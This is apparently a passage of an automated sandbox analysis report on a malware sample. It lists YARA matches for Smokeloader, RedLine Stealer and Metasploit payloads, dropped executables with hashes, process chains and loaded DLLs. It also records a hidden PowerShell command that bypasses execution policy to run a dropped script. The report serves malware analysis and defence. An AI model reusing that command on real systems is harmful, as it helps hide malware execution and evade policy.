                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC38CC406_2_00007FF6CC38CC40
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3314506_2_00007FF6CC331450
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3400506_2_00007FF6CC340050
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3858606_2_00007FF6CC385860
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3917006_2_00007FF6CC391700
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3459106_2_00007FF6CC345910
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3715106_2_00007FF6CC371510
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3B3F206_2_00007FF6CC3B3F20
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3419206_2_00007FF6CC341920
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3B16C06_2_00007FF6CC3B16C0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC345ED06_2_00007FF6CC345ED0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC335AD46_2_00007FF6CC335AD4
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3704D06_2_00007FF6CC3704D0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC353AD06_2_00007FF6CC353AD0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC33A0F06_2_00007FF6CC33A0F0
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 10_2_00007FFD9BAB2C0410_2_00007FFD9BAB2C04
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 10_2_00007FFD9BAB343010_2_00007FFD9BAB3430
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 10_2_00007FFD9BAB419610_2_00007FFD9BAB4196
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 10_2_00007FFD9BAB96ED10_2_00007FFD9BAB96ED
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 10_2_00007FFD9BAB475210_2_00007FFD9BAB4752
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 10_2_00007FFD9BAB3D1010_2_00007FFD9BAB3D10
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 10_2_00007FFD9BAC4C6C10_2_00007FFD9BAC4C6C
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 10_2_00007FFD9BAC14D010_2_00007FFD9BAC14D0
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 10_2_00007FFD9BAC08B810_2_00007FFD9BAC08B8
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 10_2_00007FFD9BAC0F0D10_2_00007FFD9BAC0F0D
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 10_2_00007FFD9BABD6F810_2_00007FFD9BABD6F8
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 10_2_00007FFD9BABD6CF10_2_00007FFD9BABD6CF
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 12_2_00007FFD9BAD342012_2_00007FFD9BAD3420
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 12_2_00007FFD9BAD418612_2_00007FFD9BAD4186
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 12_2_00007FFD9BAD474212_2_00007FFD9BAD4742
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 12_2_00007FFD9BAD3C8C12_2_00007FFD9BAD3C8C
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 12_2_00007FFD9BAD51B812_2_00007FFD9BAD51B8
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001F718913_2_001F7189
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_0020229013_2_00202290
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001F72DD13_2_001F72DD
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001E52E013_2_001E52E0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001F1B2513_2_001F1B25
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_00201B5213_2_00201B52
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001FEC4013_2_001FEC40
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_00213CD013_2_00213CD0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_0021CD4013_2_0021CD40
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_00206F8013_2_00206F80
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_0021D01013_2_0021D010
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_0021B84013_2_0021B840
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001FE08613_2_001FE086
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_0021888013_2_00218880
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_0020689013_2_00206890
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001E490013_2_001E4900
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_0021B16013_2_0021B160
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001E896013_2_001E8960
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_002041A013_2_002041A0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_0021A9E413_2_0021A9E4
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_002029C913_2_002029C9
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_0020621013_2_00206210
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001EC27013_2_001EC270
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001E727013_2_001E7270
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001F82CB13_2_001F82CB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001EFB1013_2_001EFB10
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_0021D34013_2_0021D340
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001E6B7013_2_001E6B70
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_0021B35013_2_0021B350
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_002033B613_2_002033B6
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_00204BF013_2_00204BF0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001FEC0613_2_001FEC06
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_00200CB713_2_00200CB7
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_0021B5A013_2_0021B5A0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001E3DD013_2_001E3DD0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001E5DE013_2_001E5DE0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001F367813_2_001F3678
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001F4E6813_2_001F4E68
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001F5E9713_2_001F5E97
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_0021368013_2_00213680
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001E1F1013_2_001E1F10
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_0021B70013_2_0021B700
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_00203F9713_2_00203F97
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9BAC63FB14_2_00007FFD9BAC63FB
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9BAC3AFA14_2_00007FFD9BAC3AFA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9BAC5FF514_2_00007FFD9BAC5FF5
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\60FC.exe 505968DFF5E73B6DB05CAAA86EA34633140EC3B7BB75B19167AF7CE4AF641259
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\6267.exe AF252D8F2C1166000A47BC52A23BA6DBEE07EE4ADF4DE833F633A33DB2AA2152
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 001E93B0 appears 39 times
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 001EFCA0 appears 202 times
                  Source: 60FC.exe.1.drStatic PE information: Number of sections : 12 > 10
                  Source: 6267.exe.1.drStatic PE information: No import functions for PE file found
                  Source: 6BC6.exe.1.drStatic PE information: No import functions for PE file found
                  Source: file.exe, 00000000.00000000.1684011290.0000000002448000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
                  Source: file.exeBinary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
                  Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000005.00000002.2008625039.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000000.00000002.1766138054.00000000041B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000005.00000002.2008845370.00000000026EE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000005.00000002.2008687958.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000000.00000002.1765840803.00000000026E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.1765878956.00000000026F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000005.00000002.2008604231.0000000002500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000008.00000002.2594891132.000000C0005E8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                  Source: 00000000.00000002.1766013823.000000000272D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000008.00000003.2544868852.000000C0005E8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: sbttifb.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/21@11/12
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3AF5B0 LookupPrivilegeValueA,AdjustTokenPrivileges,OpenProcessToken,6_2_00007FF6CC3AF5B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_027344E2 CreateToolhelp32Snapshot,Module32First,0_2_027344E2
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_00209C80 CoCreateInstance,13_2_00209C80
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sbttifbJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2144:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeMutant created: \Sessions\1\BaseNamedObjects\8yUscnjrUY
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1404:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6267.tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeFile opened: C:\Windows\system32\9b6f4d3caa5c4dc5fabe901536d7c83238bab0dde8fa69e7523face0d50677b4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
                  Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: file.exeReversingLabs: Detection: 36%
                  Source: file.exeVirustotal: Detection: 42%
                  Source: 60FC.exeString found in binary or memory: &github.com/filecoin-project/go-address
                  Source: 60FC.exeString found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti
                  Source: 60FC.exeString found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti
                  Source: 60FC.exeString found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
                  Source: 60FC.exeString found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\sbttifb C:\Users\user\AppData\Roaming\sbttifb
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6267.exe C:\Users\user\AppData\Local\Temp\6267.exe
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\60FC.exe C:\Users\user\AppData\Local\Temp\60FC.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6BC6.exe C:\Users\user\AppData\Local\Temp\6BC6.exe
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess created: C:\Users\user\AppData\Local\Temp\6BC6.exe "C:\Users\user\AppData\Local\Temp\6BC6.exe" -HOSTRUNAS
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6267.exe "C:\Users\user\AppData\Local\Temp\6267.exe"
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6267.exe "C:\Users\user\AppData\Local\Temp\6267.exe"
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6267.exe C:\Users\user\AppData\Local\Temp\6267.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\60FC.exe C:\Users\user\AppData\Local\Temp\60FC.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6BC6.exe C:\Users\user\AppData\Local\Temp\6BC6.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6267.exe "C:\Users\user\AppData\Local\Temp\6267.exe" Jump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6267.exe "C:\Users\user\AppData\Local\Temp\6267.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess created: C:\Users\user\AppData\Local\Temp\6BC6.exe "C:\Users\user\AppData\Local\Temp\6BC6.exe" -HOSTRUNAS Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sbttifbSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sbttifbSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sbttifbSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sbttifbSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: dnsapi.dllJump to behavior
